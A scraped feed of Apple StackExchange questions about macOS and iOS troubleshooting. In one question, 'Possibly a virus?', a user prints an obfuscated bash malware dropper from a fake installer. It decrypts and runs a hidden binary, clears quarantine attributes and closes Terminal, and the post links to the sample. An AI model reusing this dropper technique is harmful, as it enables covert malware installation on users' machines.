Cannot move Apple keyboard between two computers [closed]

Posted: 08 Mar 2022 11:48 PM PST

Every time I want to use my bluetooth keyboard with another computer, nothing is possible when I try to connect it. The connecting... enters an infinite loop. This is not how a mature technology should behave: An infinite loop! The defect is 100% reproducible. I'm forced to connect with a cable every time. It's ridiculous that the world's largest company cannot deliver the simplest thing.

If I'm forced to use a wire every time I pair it with another computer then we can't call it wireless can we?

Same defect with the "magic mouse". The world's largest company cannot make the simplest thing work.

macOS - How do I change cert trust state from command line?

My workflow involves changing a cert installed in the system's trust states between 'Use Custom Settings' and 'Never Trust' (see the Keychain Access screenshot below). enter image description here

How do I do this from command line?

Unable to connect to iMacs with ethernet using Finder's "Network" feature

Posted: 08 Mar 2022 10:52 PM PST

Trying to connect a late 2014 iMac (Big Sur) to 2020 iMac (Monterey) with Finder's "Network" feature. The official instructions from Apple are pretty spare so I figured it was probably a snap. Nope.

My 2020 iMac is connected to the outside world via the "Display Ethernet" connection supplied from the an old Thunderbolt display with an ethernet port via thunderbolt cable. Not sure if this complicates things.

Anyhow, I have the two computers connected directly to each other with an ethernet cable. I have both ports manually configured:

2020 imac: 10.0.0.1, mask: 255.255.255.0 2014 imac: 10.0.0.2, mask: 255.255.255.0

The wireless network is on a totally different network because I want to isolate the local network so transfer speeds between the computers can be fast.

Green lights are on for the ethernet settings for both computers in System Preferences -> Network. I can ping one computer from another. And that works both ways. I can also ssh from one computer to the other. So the connection is definitely working.

But when I go to finder and click on "Browse" on the 2020, I don't see the 2014 iMac at all.

One more thing I forgot to mention that I also tried to connect using the "Connect" button per Apple's instructions. I tried afp://10.0.0.2 and smb://10.0.0.2. Neither worked. Not sure if there is another protocol I should try or what.

Can Safari be set to "search on type" within the page displayed without having to use CMD + F?

Posted: 08 Mar 2022 09:53 PM PST

This used to be a feature of Firefox, yeah, the awesome browser that would blow Google Chrome out of the water on any day of the week and twice on Sunday.

So, if it is, how is it possible on Safari?

iOS Safari open link in private tab group

Posted: 08 Mar 2022 07:14 PM PST

When I long-touch a link in Safari on iOS, it shows a command called Open in Tab Group... but the Private tab group is nowhere to be found in the list of Tab groups.

Am I missing something or has Apple decided that nobody would ever want to do this for any good reason and so neither should I?

how to rsync data to JAMF-controlled MacBook OSX 12.2?

Posted: 08 Mar 2022 05:52 PM PST

I have an old and a new laptop - both are JAMF controlled. The new computer already has a account with the correct user name.

Which rsync --exclude parameters do I need, to copy over the user account without overwriting the new JAMF data?

When using Apple's migration assistant, it overwrites the JAMF data for that user on the new computer - that's why I'm asking about rsync options..

iPhone Messages app uses earpiece microphone - poor quality audio

Posted: 08 Mar 2022 02:42 PM PST

My iPhone's (iPhone XS) native Messages app (iMessage) uses the earpiece microphone for voice-messages with a very poor quality - loud background noise and very low audio volume.

The video creation and sending function in the Messages app uses the "normal" and very good microphones on the Phone.

Also, all other apps including Whatsapp, Voice Memos, Camera App, Siri, FaceTime, phone calls and so on work flawlessly with the integrated microphones (very clear audio recording).

I have already done the following Troubleshooting without success:

  1. I have cleaned all parts of the iPhone
  2. I have reset the iPhone's Settings
  3. I have performed a Hard Reset
  4. I have turned off "Phone Noise Cancellation"

Prior to completely wipe and reinstall the device (DFU) I hope someone can help me fix this weird microphone glitch/bug.

Find which Logic Pro project files contain specific plugin?

Posted: 08 Mar 2022 02:14 PM PST

Do you think it might be possible to search a folder of Logic Pro session files and figure out which of them uses a certain plugin?

I'm preparing to upgrade to the latest Mac OS, and before I do, I'll need to find all the projects that use legacy plugins that will no longer be compatible and render the audio in place. I think a lot of people, whether they've thought of this or not, would find this helpful, as OS upgrades often make older projects unplayable for this reason.

Is it worth upgrading from High Sierra to Monterey in macbook Pro?

Posted: 08 Mar 2022 03:43 PM PST

I'm using MacBook Pro with macOS High Sierra Version 10.13.6

MacBook Pro (13-inch, 2016, Two Thunderbolt 3 ports) Processor 2 GHz Intel Core i5 Memory 8GB 1867 MHz Graphis Intel Iris Graphics

I'm not able to update most of the softwares/apps, everyday I get some notifications that I have to update OS High Sierra to Monterey.

I would like to know whether it is worth to update the OS High Sierra to Monterey.

In case if I need to update, just doing a backup of all my data is fine or should I also do anything else before OS update?

Any suggestions please. Thank you in advance.

SQL Server Download Docker Issue for Mac

Posted: 08 Mar 2022 10:44 PM PST

I am trying to download SQL Server on Mac and when I type,

sudo docker pull mcr.microsoft.com/mssql/server:2019-latest

into the terminal, I get prompted to put in a password. I have tried numerous passwords with 12 characters that include upper/lowercase letters and numbers. No matter how strong I make my password I keep getting this message

passwords: Sorry, try again. Password: Sorry, try again. Password: sudo: 3 incorrect password attempts

Does anyone know how to fix this?

How can I open a private key generated in Keychain Access in TextEdit?

Posted: 08 Mar 2022 01:42 PM PST

I'm going to generate a key pair on this tutorial but I cannot open the generated private key in TextEdit.

I already enabled "Allow all applications to access this item" from "Get Info" pane but I still cannot open the file. There is also no /etc/certificates directory on my system, unlike the suggested comment there.

I just want to copy the content of the key and don't need to open it in TextEdit. But how can I check the content of it?

I use macOS 12.12.1.

Plugged in vs 20%-80% charging for maximizing battery lifespan? [closed]

Posted: 08 Mar 2022 11:31 PM PST

There seems to be two typical criteria for maximizing battery life of an iPad. One is that getting the charging percentage near 0 or 100% is to be avoided by maintaining the charge between the 20%-80% range. The other criteria is to just keep the iPad connected at all times, so that the battery doesnt charge or recharge at all (or at least stays in the 99%-100% range). I would like to know wich one is the correct aproach.

Note that the battery health option that Apple mentions to justify that we don't need to pay attention to charging is not present in some iPads.

Just in case it's useful, I'm asking about an 2021 iPad 9th gen. Which doesn't have the battery health option nor I ever saw it stop at 80%. Also take into account that even when we are told not to overthink these things, there are places in the world where it's 10x more expensive to pay for a battery replacement, so that advice does not apply.

Disk Utility with extra Mac HD after clean install on Monterey (formerly Big Sur)

Posted: 09 Mar 2022 12:03 AM PST

Not sure if I need to re-format and re-install again.

Is it normal to see so many Mac HD, and should I try to remove the extra ones?

Had some HD issue where somehow there was no space left and thus there was nothing to do but to clean install everything.

Now it seems there are multiple Mac HD / Mac HD - Data, with different avail space, as shown:

How do I make certain apps appear in the Recent Apps section in the dock, and others not appear?

Posted: 08 Mar 2022 08:03 PM PST

There's some apps I would like to disappear from the dock in the recent apps, others I want to stay.

I want the Chrome Reddit PWA to stay in the dock recent apps, but, for example, I would like CleanMyMac to disappear once closed.

The current behaviour is that when the recent apps are full, Reddit disappears instead of staying in the recent apps.

I want the Chrome Reddit PWA to stay in the dock recent apps, but, for example, I would like CleanMyMac to disappear once closed. How do I configure this? Thank you in advance!

How to move Final Cut Pro X motion templates folder to an external hard drive

External bluetooth keyboard and mouse not detected at login screen after reboot

Posted: 08 Mar 2022 05:43 PM PST

I have a Macbook Pro 15 2018 and Logitech Mx Keys and Mx Master 3 (bluetooth keyboard and mouse) and they are working great.

However when I reboot my mac and get to login screen they are not detected/connected.

When I open the lid and login using the built in keyboard they start working again.

I've found that this my be linked to FileVault and yes I am using FileVault.

My question:

Is there any way to prevent this from happening without turning FileVault off ?

When I put mac to sleep they still keep working and I can wake my mac by pressing a key on the keyboard.

How to delete backups of a volume from an APFS Time Machine snapshot?

Posted: 08 Mar 2022 04:46 PM PST

I recently reinstalled macOS Monterey (12.0.1) on my MacBook Air (Intel, 2020) and restored data from my Time Machine backup; APFS format.

That went well, but after I did this it seems like my external storage drive, named "Storage", now has an older clone next to it called "Storage 1" in recent snapshots. See screenshot below of snapshot 2021-11-26-113550.

I assume some kind of identifier for the system and drive itself changed when the restore happened. I am fine with that. But this fairly useless — and redundant — "Storage 1" is taking up about 700GB of space.

I can't seem to just delete it as a Time Machine backup is "Read Only" to the Finder and Terminal since this is the newer Time Machine format that uses APFS and snapshots instead of HFS+ and a standard filesystem scheme.

What can I do to toss this "Storage 1" folder in the snapshots and free up that 700GB?

How to retrieve information about Logic Pro softsynth configuration from LSO file?

Posted: 08 Mar 2022 02:20 PM PST

So I haven't made music in a really long time, but I made sure to save all my LSO song files from Logic so that in the future when I do get back to it I can finish unfinished songs, have old songs, etc.

That time has come, and I have Logic Pro X. There is no problem loading the LSOs but the problem comes in that many of the tracks use software synths that are discontinued or don't even work on the latest macOS. Battery 3, Absynth 4, and Kore 2.0 for example (Kore 2.0 being a wrapper like Komplete Kontrol that was discontinued a while ago)

I bought Komplete 13, and have Battery 4 and Absynth 5... but when I load up the songs obviously it says that cannot find "Battery 3", "Absynth 4" etc. I contacted Native Instruments about it and they said it's not possible.. but I know that information is stored somewhere..

Is there any software out there that has deciphered the LSO file, how the information is stored so maybe I can extract what preset was being used, or what sample banks, etc. in Battery 3? I simply refuse to believe there is no way to solve this issue.

Also think it's lame that there's no way for you to "migrate" to a newer version of the plugin. Of course at time of upgrade you can just record the patch info, knob settings etc. and transfer it to the new plugin, so its only a problem if like me, you come back after that many years.

Like a fool I threw away my old Komplete disks thinking there's no way that NI would allow an upgrade (which they still do from Komplete 2.. lol)

but anyway outside of finding an old Macbook Pro and getting Battery 3 and Absynth 4 and Kore 2 is there a way that I can somehow read the information in the LSO file so I can find out patch info, knob settings, etc.?

Possibly a virus?

Posted: 08 Mar 2022 10:40 PM PST

I'm new to Mac. I downloaded software from a website. It was a DMG file. I installed it, but then the app didn't appear in the Launchpad. I accessed the DMG and I see this strange installation script that could be a virus (why encrypt arguments??) What do you think? Where can I found the installed app and delete it?

I searched in About this Mac > System Report > Installations & Applications but is not there. And then I used the search in the Finder and neither.

EDIT: The software I tried to download was a legit software from around 115MB and when I downloaded was only 4MB... that was my first red flag. Then I run the installation, and instead of the software logo, it said it was installing flash... and then a terminal shown and hide in a second... I opened the installation file and I have this:

#!/bin/bash  G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";  export appDir=$(cd "$(dirname "$0")"; pwd -P)  export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"  export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"  export archive="$(echo $binFile | rev)"  export commandArgs='U2FsdGVkX18mEBVdMEhSyNthIprtcEexqgmiVNi7GYZhMTp6b/5TLfySc6T7DDx4s/IhTc8GJ2IjrqeWRIb8Rv9r8FqrZplCOhnKlqwMSumhQ5K47p1GzR7WEpWxL2cdbMPuQDuntt9UqqoIuDsJrH5S2rkk8gbKu6+XIMA8rtTe1XzG/yjQXOWDzF6YzLyuy4Mf9Ro26V9NWalR+VmHaX6V0Mdpy9Gw/01HB93qNTV3VuzwYNBxInWHSgeJ4lMOYmg2YjmF6ihs4fA8cdJk0qoKKh87gzad3PoFiBKRmMIfqtwC/BBZ+F+GP2fIAav3'  decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"  nohup /bin/bash -c "${H}v${G}${V} \"$decryptedFommand\"" >/dev/null 2>&1 &  killall Terminal

Which is pretty strange... why an installation would encrypt it's parameters???

So according to this, I created a new bash script with this:

#!/bin/bash  G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";  export appDir=$(cd "$(dirname "$0")"; pwd -P)  export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"  export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"  export archive="$(echo $binFile | rev)"  export commandArgs='U2FsdGVkX18mEBVdMEhSyNthIprtcEexqgmiVNi7GYZhMTp6b/5TLfySc6T7DDx4s/IhTc8GJ2IjrqeWRIb8Rv9r8FqrZplCOhnKlqwMSumhQ5K47p1GzR7WEpWxL2cdbMPuQDuntt9UqqoIuDsJrH5S2rkk8gbKu6+XIMA8rtTe1XzG/yjQXOWDzF6YzLyuy4Mf9Ro26V9NWalR+VmHaX6V0Mdpy9Gw/01HB93qNTV3VuzwYNBxInWHSgeJ4lMOYmg2YjmF6ihs4fA8cdJk0qoKKh87gzad3PoFiBKRmMIfqtwC/BBZ+F+GP2fIAav3'  decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"

And I tried first to echo commandArgs and then decryptedFommand but in both cases I got:

4379344364:error:06FFF064:digital envelope routines:CRYPTO_internal:bad decrypt:/System/Volumes/Data/SWE/macOS/BuildRoots/38cf1d983f/Library/Caches/com.apple.xbs/Sources/libressl/libressl-56.60.2/libressl-2.8/crypto/evp/evp_enc.c:521:

According to the comments from @nohillside there was another file which had the key to the encryption. So I got that file and put it on the same folder as the script. But also it used it's own name, so I had to rename it to match the original script, which was Install.command. And with that, I could get that decryptedFomand prints:

$(echo "openssl enc -aes-256-cbc -d -A -base64 -k \"$archive\" -in \"$appDir/$archive\" -out \"$tmpDir/$binFile\"; xattr -c \"$tmpDir/\"*; chmod 777 \"$tmpDir/$binFile\"; \"$tmpDir/$binFile\" && rm -rf $tmpDir")

And then uses that to run the last command:

nohup /bin/bash -c "${H}v${G}${V} \"$decryptedFommand\"" >/dev/null 2>&1 & killall Terminal

So what it's doing?

I uploaded the suspicious DMG to my Google Drive just in case it helps: https://drive.google.com/file/d/1O2WihwZyzjzUZVwLkAfmCw8nqXYZeG96/view?usp=sharing In case you can't download the DMG, I put a zip file with both files (installer and the key file): https://drive.google.com/file/d/1YDccdiWZsgNMcqvGPmuiatJfBnfns5lE/view?usp=sharing

Safari 15.0 on the Mac keeps on reopening closed windows

Posted: 08 Mar 2022 04:01 PM PST

I'm running the new Safari 15 on MacOS 11.6 (Big Sur) and when I close the software and reopen it, the windows I've closed in the prior session reopen unlike before I upgraded Safari to the latest release.

I've tried emptying the caches. There's over 50GB of storage space. The system has plenty of unused RAM. Safari hung the first time I tried opening it after the upgrade.

Problem mounting NFS shares from OSX servers

Posted: 08 Mar 2022 03:06 PM PST

I am having a problem using NFS connecting to shares from a Mac with Catalina and another one with Snow Leopard (don't ask why ;). I just updated to BigSur 11.4 When I use :

-fstype=nfs,noowners,nolockd,noresvport,hard,bg,intr,rw,tcp,nfc

in /etc/auto_nfs

cd /System/Volumes/Data/NetVolumes/data -bash: cd: /System/Volumes/Data/NetVolumes/data: Invalid argument

if by other hand I use

-fstype=nfs,rw,sync

cd /System/Volumes/Data/NetVolumes/data1 -bash: cd: /System/Volumes/Data/NetVolumes/data1: RPC prog. not avail

Disabling wifi password sync between Apple TV and iPhone

Posted: 08 Mar 2022 07:09 PM PST

I'm in an environment with a wireless network that has a different WPA key for each user. My Apple TV and my phone have different passwords, but they seem to insist on syncing between themselves. The end result is I have to keep re-entering passwords on one or the other device. Both devices are on the same Apple ID.

I've looked through all the settings and can't find anything, but is there any way to stop this password sharing between devices?

M1 Mac mini - Your computer was restarted because of a problem

Posted: 08 Mar 2022 10:01 PM PST

I've used my M1 Mac mini for about a month and already got about five crashes/reboots. Whenever this happened, I hadn't been doing anything special, nothing that was related to any installed software.

This time, I simply watched a YouTube video and wanted to pause it. My mouse froze for 5 seconds, a pink screen appeared and then the Mac rebooted.

I got the "Your computer was restarted because of a problem." message and this report. I have no idea how to read this. Is there anybody who can see what's wrong with my mac?

Automator application that asks me for a YouTube URL before running the command

Posted: 08 Mar 2022 09:05 PM PST

I'm trying to make an Automator application that runs this command:

youtube-dl -x --audio-format wav -o "~/Downloads/%(title)s.%(ext)s" 'youtube file url'

but I'd like for it to ask me for the YouTube URL before running. Have been unsuccessful so far, would appreciate any help.

How to make remove free space and make APFS container take it up

Posted: 08 Mar 2022 04:44 PM PST

I am on 11.1 Big Sur beta. I have a partition with no disk identifier called (free space) I would like to remove this, and then make the APFS container take up the free space.

Here is a screenshot of my GPT and Disks

How to block specific apps on an iPhone

Posted: 08 Mar 2022 02:04 PM PST

I'm having a hard time configuring my daughter's iPhone with Screen time. I would like to completely block some apps during the weekdays and allow some time for them during the weekends.

Screen time only allows me to set a limit strictly greater than 0, so I have to set all the apps I want to block to 1 minute. Knowing that she can auto-extend for 1 additional minute, an app that I want blocked has instead 2 minutes of usage per day (not a big deal but still...). There is a "Always Allowed apps" list but not a "Never Allowed apps" list. Uninstalling the apps is also not a solution as I want them available during the weekend.

Is there a way, with Screen time or another app, to have a better control and put in place what is described above?

Keynote Master Slide Text Box Placeholder Relative Position

Posted: 08 Mar 2022 05:05 PM PST

I have a Keynote Master Slide set, where I have two text box placeholders with two different text styles, see picture, "Name" and "Date" (a date span).

enter image description here

The Name textbox could have content wrapping to multiple lines. In that case, I would like the Date to continue to stay 8 pixels below the Name textbox. Right now, the Name box will overflow the Date box.

enter image description here

How can I achieve the Date textbox stay n pixels below Name?

iPhone 11 plays random music without prompting, what's going on?

Posted: 08 Mar 2022 10:07 PM PST

My wife's iPhone 11 running iOS 13.3.1 seems to randomly start playing stuff from the music app. We don't have Pandora or anything like it on there. The music seems to play in random situations; I haven't been able to isolate what's going on. We restarted, turned off the handoff in settings, I turned off bluetooth. Whether headphones are connected doesn't seem to matter.

I looked up the phenomenon on the 'net and found some vague answers, but there's simply not a lot of helpful information. Anyone else see anything like this?

What is Fetch > Automatically in iPhone in Settings > accounts and passwords?

I found this puzzling setting in iPhone Settings > accounts and passwords (for iOS 11):

Is Fetch > automatically the same as Push?. How does it work with Google Contacts, Gmail, etc?

Change Account Password to Blank

Posted: 08 Mar 2022 08:18 PM PST

I recently changed an account password by accident, and was wondering how to set it back to a blank password via the shell. I have root privileges. Please help :)

passwd USER doesn't accept blank passwords
